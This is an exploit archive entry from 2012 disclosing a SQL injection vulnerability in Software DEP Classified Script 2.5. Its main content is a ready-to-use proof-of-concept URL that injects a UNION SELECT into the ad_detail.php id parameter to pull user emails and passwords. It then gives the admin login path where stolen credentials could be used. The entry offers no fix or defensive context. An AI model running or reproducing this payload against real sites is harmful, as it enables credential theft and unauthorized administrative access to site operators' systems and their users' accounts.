Software DEP Classified Script 2.5 SQL Injection Vulnerability
| EKU-ID: 1911 | CVE: | OSVDB-ID: |
| Author: hordcode security | Published: 2012-04-13 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 1911 | CVE: | OSVDB-ID: |
| Author: hordcode security | Published: 2012-04-13 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Software DEP Classified Script 2.5 SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Author: h0rd
Contact: h0rd[at]null.net
homepage: http://h0rd.net
download: http://www.softwaredep.com/classified-script.html
Price: $199
PoC exploit:
http://[host]/ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user--
login page:
http://[host]/[script]/admin/